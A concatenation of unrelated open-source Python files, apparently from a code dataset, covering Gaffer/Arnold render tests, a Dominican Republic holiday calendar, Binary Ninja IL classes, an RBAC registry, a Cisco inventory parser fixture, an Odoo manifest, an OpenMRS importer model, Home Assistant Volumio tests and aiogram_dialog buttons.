s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["globalAttrs"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
plane = arnold.AiNodeLookUpByName( universe, "/plane" )
shader = arnold.AiNodeGetPtr( plane, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader, "filename" ), "bar/path/foo.tx" )
cube = arnold.AiNodeLookUpByName( universe, "/plane/cube" )
shader2 = arnold.AiNodeGetPtr( cube, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader2, "filename" ), "bar/path/override.tx" )
light = arnold.AiNodeLookUpByName( universe, "light:/lightGroup/light" )
self.assertEqual( arnold.AiNodeGetStr( light, "filename" ), "/path/default1.ies" )
gobo = arnold.AiNodeGetPtr( light, "filters" )
goboTex = arnold.AiNodeGetLink( gobo, "slidemap" )
self.assertEqual( arnold.AiNodeGetStr( goboTex, "filename" ), "default2/gobo.tx" )
lightFilter = arnold.AiNodeLookUpByName( universe, "lightFilter:/lightGroup/lightFilter" )
self.assertEqual( arnold.AiNodeGetStr( lightFilter, "geometry_type" ), "cylinder" )
def testEncapsulateDeformationBlur( self ) :
s = Gaffer.ScriptNode()
# Make a sphere where the red channel has the value of the current frame.
s["sphere"] = GafferScene.Sphere()
s["sphereFilter"] = GafferScene.PathFilter()
s["sphereFilter"]["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
s["frame"] = GafferTest.FrameNode()
s["flat"] = GafferArnold.ArnoldShader()
s["flat"].loadShader( "flat" )
s["flat"]["parameters"]["color"].setValue( imath.Color3f( 0 ) )
s["flat"]["parameters"]["color"]["r"].setInput( s["frame"]["output"] )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["sphere"]["out"] )
s["assignment"]["shader"].setInput( s["flat"]["out"] )
s["assignment"]["filter"].setInput( s["sphereFilter"]["out"] )
# Put the sphere in a capsule.
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["assignment"]["out"] )
s["groupFilter"] = GafferScene.PathFilter()
s["groupFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
s["encapsulate"] = GafferScene.Encapsulate()
s["encapsulate"]["in"].setInput( s["group"]["out"] )
s["encapsulate"]["filter"].setInput( s["groupFilter"]["out"] )
# Do a render at frame 1, with deformation blur off.
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ),
"exr",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["encapsulate"]["out"] )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["outputs"]["out"] )
s["arnoldOptions"] = GafferArnold.ArnoldOptions()
s["arnoldOptions"]["in"].setInput( s["options"]["out"] )
s["arnoldOptions"]["options"]["aaSamples"]["enabled"].setValue( True )
s["arnoldOptions"]["options"]["aaSamples"]["value"].setValue( 6 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["arnoldOptions"]["out"] )
s["render"]["task"].execute()
# Do another render at frame 1, but with deformation blur on.
s["options"]["options"]["deformationBlur"]["enabled"].setValue( True )
s["options"]["options"]["deformationBlur"]["value"].setValue( True )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["shutter"]["value"].setValue( imath.V2f( -0.5, 0.5 ) )
s["outputs"]["outputs"][0]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
s["render"]["task"].execute()
# Check that the renders are the same.
s["deformationOff"] = GafferImage.ImageReader()
s["deformationOff"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ) )
s["deformationOn"] = GafferImage.ImageReader()
s["deformationOn"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
# The `maxDifference` is huge to account for noise and watermarks, but is still low enough to check what
# we want, since if the Encapsulate was sampled at shutter open and not the frame, the difference would be
# 0.5.
self.assertImagesEqual( s["deformationOff"]["out"], s["deformationOn"]["out"], maxDifference = 0.27, ignoreMetadata = True )
def testCoordinateSystem( self ) :
coordinateSystem = GafferScene.CoordinateSystem()
render = GafferArnold.ArnoldRender()
render["in"].setInput( coordinateSystem["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( os.path.join( self.temporaryDirectory(), "test.ass" ) )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, render["fileName"].getValue() )
# Arnold doesn't support coordinate systems, so we don't expect a
# node to have been created for ours.
self.assertIsNone( arnold.AiNodeLookUpByName( universe, "/coordinateSystem" ) )
if __name__ == "__main__":
unittest.main()
|
holidays/countries/dominican_republic.py
|
m-ganko/python-holidays
| 654 |
129020
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <<EMAIL>> (c) 2014-2017
# dr-prodigy <<EMAIL>> (c) 2017-2021
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd, MO, FR
from holidays.constants import JAN, FEB, MAY, JUN, AUG, SEP, NOV, DEC
from holidays.holiday_base import HolidayBase
class DominicanRepublic(HolidayBase):
# http://ojd.org.do/Normativas/LABORAL/Leyes/Ley%20No.%20%20139-97.pdf
# https://es.wikipedia.org/wiki/Rep%C3%BAblica_Dominicana#D%C3%ADas_festivos_nacionales
def __init__(self, **kwargs):
self.country = "DO"
HolidayBase.__init__(self, **kwargs)
@staticmethod
def __change_day_by_law(holiday, latest_days=(3, 4)):
# Law No. 139-97 - Holidays Dominican Republic - Jun 27, 1997
if holiday >= date(1997, 6, 27):
if holiday.weekday() in [1, 2]:
holiday -= rd(weekday=MO(-1))
elif holiday.weekday() in latest_days:
holiday += rd(weekday=MO(1))
return holiday
def _populate(self, year):
# New Year's Day
self[date(year, JAN, 1)] = "Año Nuevo [New Year's Day]"
# Epiphany
epiphany_day = self.__change_day_by_law(date(year, JAN, 6))
self[epiphany_day] = "Día de los Santos Reyes [Epiphany]"
# Lady of Altagracia
self[date(year, JAN, 21)] = "Día de la Altagracia [Lady of Altagracia]"
# <NAME>
duarte_day = self.__change_day_by_law(date(year, JAN, 26))
self[duarte_day] = "Día de Duarte [Juan Pablo Duarte Day]"
# Independence Day
self[date(year, FEB, 27)] = "Día de Independencia [Independence Day]"
# Good Friday
self[easter(year) + rd(weekday=FR(-1))] = "Viernes Santo [Good Friday]"
# Labor Day
labor_day = self.__change_day_by_law(date(year, MAY, 1), (3, 4, 6))
self[labor_day] = "Día del Trabajo [Labor Day]"
# Feast of Corpus Christi
self[date(year, JUN, 11)] = "Corpus Christi [Feast of Corpus Christi]"
# Restoration Day
# Judgment No. 14 of Feb 20, 2008 of the Supreme Court of Justice
restoration_day = (
date(year, AUG, 16)
if ((year - 2000) % 4 == 0) and year < 2008
else self.__change_day_by_law(date(year, AUG, 16))
)
self[restoration_day] = "Día de la Restauración [Restoration Day]"
# Our Lady of Mercedes Day
self[
date(year, SEP, 24)
] = "Día de las Mercedes \
[Our Lady of Mercedes Day]"
# Constitution Day
constitution_day = self.__change_day_by_law(date(year, NOV, 6))
self[constitution_day] = "Día de la Constitución [Constitution Day]"
# Christmas Day
self[date(year, DEC, 25)] = "Día de Navidad [Christmas Day]"
class DO(DominicanRepublic):
pass
class DOM(DominicanRepublic):
pass
|
python/commonil.py
|
cblichmann/binaryninja-api
| 589 |
129027
|
# Copyright (c) 2019-2021 Vector 35 Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from dataclasses import dataclass
from .flowgraph import FlowGraph, FlowGraphNode
from .enums import BranchType
from .interaction import show_graph_report
from .log import log_warn
# This file contains a list of top level abstract classes for implementing BNIL instructions
@dataclass(frozen=True, repr=False)
class BaseILInstruction:
@classmethod
def prepend_parent(cls, graph:FlowGraph, node:FlowGraphNode, nodes={}):
for parent in cls.__bases__:
if not issubclass(parent, BaseILInstruction):
continue
if parent.__name__ in nodes:
nodes[parent.__name__].add_outgoing_edge(BranchType.UnconditionalBranch, node)
else:
parent_node = FlowGraphNode(graph)
parent_node.lines = [f"{parent.__name__}"]
parent_node.add_outgoing_edge(BranchType.UnconditionalBranch, node)
graph.append(parent_node)
nodes[parent.__name__] = parent_node
parent.prepend_parent(graph, parent_node, nodes)
@classmethod
def add_subgraph(cls, graph, nodes):
node = FlowGraphNode(graph)
node.lines = [f"{cls.__name__}"]
graph.append(node)
cls.prepend_parent(graph, node, nodes)
return graph
@classmethod
def show_hierarchy_graph(cls):
show_graph_report(f"{cls.__name__}", cls.add_subgraph(FlowGraph(), {}))
@dataclass(frozen=True, repr=False)
class Constant(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class BinaryOperation(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class UnaryOperation(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Comparison(BinaryOperation):
pass
@dataclass(frozen=True, repr=False)
class SSA(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Phi(SSA):
pass
@dataclass(frozen=True, repr=False)
class FloatingPoint(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class ControlFlow(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Terminal(ControlFlow):
pass
@dataclass(frozen=True, repr=False)
class Loop(ControlFlow):
pass
@dataclass(frozen=True, repr=False)
class Call(ControlFlow):
pass
@dataclass(frozen=True, repr=False)
class Syscall(Call):
pass
@dataclass(frozen=True, repr=False)
class Tailcall(Call):
pass
@dataclass(frozen=True, repr=False)
class Return(Terminal):
pass
@dataclass(frozen=True, repr=False)
class Signed(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Arithmetic(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Carry(Arithmetic):
pass
@dataclass(frozen=True, repr=False)
class DoublePrecision(Arithmetic):
pass
@dataclass(frozen=True, repr=False)
class Memory(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Load(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Store(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class RegisterStack(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class SetVar(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class StackOperation(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class SetReg:
pass
|
rbac/acl.py
|
eldorplus/simple-rbac
| 219 |
129030
|
from __future__ import absolute_import
import itertools
__all__ = ["Registry"]
class Registry(object):
"""The registry of access control list."""
def __init__(self):
self._roles = {}
self._resources = {}
self._allowed = {}
self._denied = {}
# to allow additional short circuiting, track roles that only
# ever deny access
self._denial_only_roles = set()
self._children = {}
def add_role(self, role, parents=[]):
"""Add a role or append parents roles to a special role.
All added roles should be hashable.
(http://docs.python.org/glossary.html#term-hashable)
"""
self._roles.setdefault(role, set())
self._roles[role].update(parents)
for p in parents:
self._children.setdefault(p, set())
self._children[p].add(role)
# all roles start as deny-only (unless one of its parents
# isn't deny-only)
if not parents or self._roles_are_deny_only(parents):
self._denial_only_roles.add(role)
def add_resource(self, resource, parents=[]):
"""Add a resource or append parents resources to a special resource.
All added resources should be hashable.
(http://docs.python.org/glossary.html#term-hashable)
"""
self._resources.setdefault(resource, set())
self._resources[resource].update(parents)
def allow(self, role, operation, resource, assertion=None):
"""Add a allowed rule.
The added rule will allow the role and its all children roles to
operate the resource.
"""
assert not role or role in self._roles
assert not resource or resource in self._resources
self._allowed[role, operation, resource] = assertion
# since we just allowed a permission, role and any children aren't
# denied-only
for r in itertools.chain([role], get_family(self._children, role)):
self._denial_only_roles.discard(r)
def deny(self, role, operation, resource, assertion=None):
"""Add a denied rule.
The added rule will deny the role and its all children roles to
operate the resource.
"""
assert not role or role in self._roles
assert not resource or resource in self._resources
self._denied[role, operation, resource] = assertion
def is_allowed(self, role, operation, resource, check_allowed=True,
**assertion_kwargs):
"""Check the permission.
If the access is denied, this method will return False; if the access
is allowed, this method will return True; if there is not any rule
for the access, this method will return None.
"""
assert not role or role in self._roles
assert not resource or resource in self._resources
roles = set(get_family(self._roles, role))
operations = {None, operation}
resources = set(get_family(self._resources, resource))
def DefaultAssertion(*args, **kwargs):
return True
is_allowed = None
default_assertion = DefaultAssertion
for permission in itertools.product(roles, operations, resources):
if permission in self._denied:
assertion = self._denied[permission] or default_assertion
if assertion(self, role, operation, resource,
**assertion_kwargs):
return False # denied by rule immediately
if check_allowed and permission in self._allowed:
assertion = self._allowed[permission] or default_assertion
if assertion(self, role, operation, resource,
**assertion_kwargs):
is_allowed = True # allowed by rule
return is_allowed
def is_any_allowed(self, roles, operation, resource, **assertion_kwargs):
"""Check the permission with many roles."""
is_allowed = None # no matching rules
for i, role in enumerate(roles):
# if access not yet allowed and all remaining roles could
# only deny access, short-circuit and return False
if not is_allowed and self._roles_are_deny_only(roles[i:]):
return False
check_allowed = not is_allowed
# if another role gave access,
# don't bother checking if this one is allowed
is_current_allowed = self.is_allowed(role, operation, resource,
check_allowed=check_allowed,
**assertion_kwargs)
if is_current_allowed is False:
return False # denied by rule
elif is_current_allowed is True:
is_allowed = True
return is_allowed
def _roles_are_deny_only(self, roles):
return all(r in self._denial_only_roles for r in roles)
def get_family(all_parents, current):
"""Iterate current object and its all parents recursively."""
yield current
for parent in get_parents(all_parents, current):
yield parent
yield None
def get_parents(all_parents, current):
"""Iterate current object's all parents."""
for parent in all_parents.get(current, []):
yield parent
for grandparent in get_parents(all_parents, parent):
yield grandparent
|
src/genie/libs/parser/ios/asr901/tests/ShowInventory/cli/equal/golden_output_expected.py
|
balmasea/genieparser
| 204 |
129076
|
<gh_stars>100-1000
expected_output = {
"main": {
"chassis": {
"name": {
"descr": "A901-6CZ-FT-A Chassis",
"name": "A901-6CZ-FT-A Chassis",
"pid": "A901-6CZ-FT-A",
"sn": "CAT2342U1S6",
"vid": "V04 "
}
}
},
"slot": {
"0": {
"rp": {
"A901-6CZ-FT-A Chassis": {
"descr": "A901-6CZ-FT-A Chassis",
"name": "A901-6CZ-FT-A Chassis",
"pid": "A901-6CZ-FT-A",
"sn": "CAT2342U1S6",
"subslot": {
"0/11": {
"GigabitEthernet 0/11": {
"descr": "1000BASE-T SFP",
"name": "GigabitEthernet 0/11",
"pid": "GLC-T",
"sn": "AGM183321AW",
"vid": "B2 "
}
}
},
"vid": "V04 "
}
}
},
"AC/DC Power supply": {
"other": {
"AC/DC Power supply": {
"descr": "AC/DC Power Supply 1 (12V)",
"name": "AC/DC Power supply",
"pid": "POWER SUPPLY",
"sn": "34-2593-01",
"vid": ""
}
}
},
"Board Temperature Sensor": {
"other": {
"Board Temperature Sensor": {
"descr": "Board Temperature Sensor",
"name": "Board Temperature Sensor",
"pid": "Temperature Sensor",
"sn": "15-9325-01",
"vid": ""
}
}
},
"Fan1": {
"other": {
"Fan1": {
"descr": "High Speed Fan1 Module for A901-6CZ-FT-A",
"name": "Fan1",
"pid": "FAN",
"sn": "33-0629-01",
"vid": ""
}
}
},
"Fan2": {
"other": {
"Fan2": {
"descr": "High Speed Fan2 Module for A901-6CZ-FT-A",
"name": "Fan2",
"pid": "FAN",
"sn": "33-0629-01",
"vid": ""
}
}
},
"Fan3": {
"other": {
"Fan3": {
"descr": "High Speed Fan3 Module for A901-6CZ-FT-A",
"name": "Fan3",
"pid": "FAN",
"sn": "33-0629-01",
"vid": ""
}
}
},
"GigabitEthernet 0/10": {
"other": {
"GigabitEthernet 0/10": {
"descr": "1000BASE-T SFP",
"name": "GigabitEthernet 0/10",
"pid": "SBCU-5740ARZ-CS1",
"sn": "AVC211321TE",
"vid": "G3."
}
}
},
"Inlet Temperature Sensor": {
"other": {
"Inlet Temperature Sensor": {
"descr": "Inlet Temperature Sensor",
"name": "Inlet Temperature Sensor",
"pid": "Temperature Sensor",
"sn": "15-9325-01",
"vid": ""
}
}
}
}
}
|
ch03/library_app/__manifest__.py
|
dreispt/Odoo-12-Development-Essentials-Fourth-Edition
| 121 |
129092
|
<gh_stars>100-1000
{'name': 'Library Management Application',
'description': 'Library books, members and book borrowing.',
'author': '<NAME>',
'depends': ['base'],
'data': [
'security/library_security.xml',
'security/ir.model.access.csv',
'views/library_menu.xml',
'views/book_view.xml',
'views/book_list_template.xml',
],
'application': True,
'installable': True,
}
|
corehq/motech/openmrs/models.py
|
akashkj/commcare-hq
| 471 |
129143
|
<gh_stars>100-1000
import re
from datetime import datetime
from functools import partial
from memoized import memoized
from dimagi.ext.couchdbkit import (
DictProperty,
Document,
DocumentSchema,
IntegerProperty,
ListProperty,
StringProperty,
)
from corehq.motech.const import (
COMMCARE_DATA_TYPE_DATE,
COMMCARE_DATA_TYPE_DATETIME,
COMMCARE_DATA_TYPES,
DATA_TYPE_UNKNOWN,
IMPORT_FREQUENCY_CHOICES,
IMPORT_FREQUENCY_DAILY,
IMPORT_FREQUENCY_MONTHLY,
IMPORT_FREQUENCY_WEEKLY,
)
from corehq.motech.openmrs.const import (
OPENMRS_DATA_TYPE_MILLISECONDS,
OPENMRS_DATA_TYPES,
)
from corehq.motech.openmrs.serializers import (
omrs_timestamp_to_date,
omrs_timestamp_to_datetime,
serializers,
)
from corehq.util.timezones.utils import (
coerce_timezone_value,
get_timezone_for_domain,
)
class ColumnMapping(DocumentSchema):
column = StringProperty()
property = StringProperty()
data_type = StringProperty(choices=OPENMRS_DATA_TYPES, required=False)
commcare_data_type = StringProperty(
required=False, choices=COMMCARE_DATA_TYPES + (DATA_TYPE_UNKNOWN,),
default=DATA_TYPE_UNKNOWN, exclude_if_none=True
)
def deserialize(mapping, external_value, timezone=None):
"""
Returns ``external_value`` as its CommCare data type.
"""
# Update serializers with timezone
to_datetime_tz = partial(omrs_timestamp_to_datetime, tz=timezone)
to_date_tz = partial(omrs_timestamp_to_date, tz=timezone)
local_serializers = serializers.copy()
local_serializers.update({
(OPENMRS_DATA_TYPE_MILLISECONDS, None): to_datetime_tz,
(OPENMRS_DATA_TYPE_MILLISECONDS, COMMCARE_DATA_TYPE_DATETIME): to_datetime_tz,
(OPENMRS_DATA_TYPE_MILLISECONDS, COMMCARE_DATA_TYPE_DATE): to_date_tz,
})
serializer = (
local_serializers.get((mapping.data_type, mapping.commcare_data_type))
or local_serializers.get((None, mapping.commcare_data_type))
)
return serializer(external_value) if serializer else external_value
class OpenmrsImporter(Document):
"""
Import cases from an OpenMRS instance using a report
"""
domain = StringProperty()
# TODO: (2020-03-06) Migrate to ConnectionSettings
server_url = StringProperty() # e.g. "http://www.example.com/openmrs"
username = StringProperty()
password = StringProperty()
notify_addresses_str = StringProperty(default="") # See also notify_addresses()
# If a domain has multiple OpenmrsImporter instances, for which CommCare location is this one authoritative?
location_id = StringProperty()
# How often should cases be imported
import_frequency = StringProperty(choices=IMPORT_FREQUENCY_CHOICES, default=IMPORT_FREQUENCY_MONTHLY)
log_level = IntegerProperty()
# Timezone name. If not specified, the domain's timezone will be used.
timezone = StringProperty()
# OpenMRS UUID of the report of patients to be imported
report_uuid = StringProperty()
# Can include template params, e.g. {"endDate": "{{ today }}"}
# Available template params: "today", "location"
report_params = DictProperty()
# The case type of imported cases
case_type = StringProperty()
# The ID of the owner of imported cases, if all imported cases are to have the same owner. To assign imported
# cases to different owners, see `location_type` below.
owner_id = StringProperty()
# If report_params includes "{{ location }}" then location_type_name is used to determine which locations to
# pull the report for. Those locations will need an "openmrs_uuid" param set. Imported cases will be owned by
# the first mobile worker assigned to that location. If this OpenmrsImporter.location_id is set, only
# sub-locations will be returned
location_type_name = StringProperty()
# external_id should always be the OpenMRS UUID of the patient (and not, for example, a national ID number)
# because it is immutable. external_id_column is the column that contains the UUID
external_id_column = StringProperty()
# Space-separated column(s) to be concatenated to create the case name (e.g. "givenName familyName")
name_columns = StringProperty()
column_map = ListProperty(ColumnMapping)
def __str__(self):
url = "@".join((self.username, self.server_url)) if self.username else self.server_url
return f"<{self.__class__.__name__} {self._id} {url}>"
@property
def notify_addresses(self):
return [addr for addr in re.split('[, ]+', self.notify_addresses_str) if addr]
@memoized
def get_timezone(self):
if self.timezone:
return coerce_timezone_value(self.timezone)
else:
return get_timezone_for_domain(self.domain)
def should_import_today(self):
today = datetime.today()
return (
self.import_frequency == IMPORT_FREQUENCY_DAILY
or (
self.import_frequency == IMPORT_FREQUENCY_WEEKLY
and today.weekday() == 1 # Tuesday
)
or (
self.import_frequency == IMPORT_FREQUENCY_MONTHLY
and today.day == 1
)
)
|
tests/components/volumio/test_config_flow.py
|
MrDelik/core
| 30,023 |
129152
|
<reponame>MrDelik/core
"""Test the Volumio config flow."""
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components import zeroconf
from homeassistant.components.volumio.config_flow import CannotConnectError
from homeassistant.components.volumio.const import DOMAIN
from tests.common import MockConfigEntry
TEST_SYSTEM_INFO = {"id": "1111-1111-1111-1111", "name": "TestVolumio"}
TEST_CONNECTION = {
"host": "1.1.1.1",
"port": 3000,
}
TEST_DISCOVERY = zeroconf.ZeroconfServiceInfo(
host="1.1.1.1",
addresses=["1.1.1.1"],
hostname="mock_hostname",
name="mock_name",
port=3000,
properties={"volumioName": "discovered", "UUID": "2222-2222-2222-2222"},
type="mock_type",
)
TEST_DISCOVERY_RESULT = {
"host": TEST_DISCOVERY.host,
"port": TEST_DISCOVERY.port,
"id": TEST_DISCOVERY.properties["UUID"],
"name": TEST_DISCOVERY.properties["volumioName"],
}
async def test_form(hass):
"""Test we get the form."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value=TEST_SYSTEM_INFO,
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "TestVolumio"
assert result2["data"] == {**TEST_SYSTEM_INFO, **TEST_CONNECTION}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_updates_unique_id(hass):
"""Test a duplicate id aborts and updates existing entry."""
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_SYSTEM_INFO["id"],
data={
"host": "dummy",
"port": 11,
"name": "dummy",
"id": TEST_SYSTEM_INFO["id"],
},
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value=TEST_SYSTEM_INFO,
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
await hass.async_block_till_done()
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
assert entry.data == {**TEST_SYSTEM_INFO, **TEST_CONNECTION}
async def test_empty_system_info(hass):
"""Test old volumio versions with empty system info."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value={},
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_CONNECTION["host"]
assert result2["data"] == {
"host": TEST_CONNECTION["host"],
"port": TEST_CONNECTION["port"],
"name": TEST_CONNECTION["host"],
"id": None,
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
side_effect=CannotConnectError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_exception(hass):
"""Test we handle generic error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
side_effect=Exception,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_discovery(hass):
"""Test discovery flow works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value=TEST_SYSTEM_INFO,
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_DISCOVERY_RESULT["name"]
assert result2["data"] == TEST_DISCOVERY_RESULT
assert result2["result"]
assert result2["result"].unique_id == TEST_DISCOVERY_RESULT["id"]
assert len(mock_setup_entry.mock_calls) == 1
async def test_discovery_cannot_connect(hass):
"""Test discovery aborts if cannot connect."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
side_effect=CannotConnectError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={},
)
assert result2["type"] == "abort"
assert result2["reason"] == "cannot_connect"
async def test_discovery_duplicate_data(hass):
"""Test discovery aborts if same mDNS packet arrives."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
assert result["type"] == "form"
assert result["step_id"] == "discovery_confirm"
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
assert result["type"] == "abort"
assert result["reason"] == "already_in_progress"
async def test_discovery_updates_unique_id(hass):
"""Test a duplicate discovery id aborts and updates existing entry."""
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_DISCOVERY_RESULT["id"],
data={
"host": "dummy",
"port": 11,
"name": "dummy",
"id": TEST_DISCOVERY_RESULT["id"],
},
state=config_entries.ConfigEntryState.SETUP_RETRY,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_ZEROCONF},
data=TEST_DISCOVERY,
)
await hass.async_block_till_done()
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert entry.data == TEST_DISCOVERY_RESULT
assert len(mock_setup_entry.mock_calls) == 1
|
aiogram_dialog/widgets/kbd/button.py
|
SamWarden/aiogram_dialog
| 198 |
129178
|
from typing import List, Callable, Optional, Union, Dict, Awaitable, Any
from aiogram.types import InlineKeyboardButton, CallbackQuery
from aiogram_dialog.dialog import Dialog
from aiogram_dialog.manager.manager import DialogManager
from aiogram_dialog.widgets.text import Text
from aiogram_dialog.widgets.widget_event import WidgetEventProcessor, ensure_event_processor
from .base import Keyboard
from ..when import WhenCondition
OnClick = Callable[[CallbackQuery, "Button", DialogManager], Awaitable]
class Button(Keyboard):
def __init__(self, text: Text, id: str,
on_click: Union[OnClick, WidgetEventProcessor, None] = None,
when: WhenCondition = None):
super().__init__(id, when)
self.text = text
self.on_click = ensure_event_processor(on_click)
async def process_callback(self, c: CallbackQuery, dialog: Dialog, manager: DialogManager) -> bool:
if c.data != self.widget_id:
return False
await self.on_click.process_event(c, self, manager)
return True
async def _render_keyboard(self, data: Dict, manager: DialogManager) -> List[List[InlineKeyboardButton]]:
return [[
InlineKeyboardButton(
text=await self.text.render_text(data, manager),
callback_data=self.widget_id
)
]]
class Url(Keyboard):
def __init__(self, text: Text, url: Text, id: Optional[str] = None, when: Union[str, Callable, None] = None):
super().__init__(id, when)
self.text = text
self.url = url
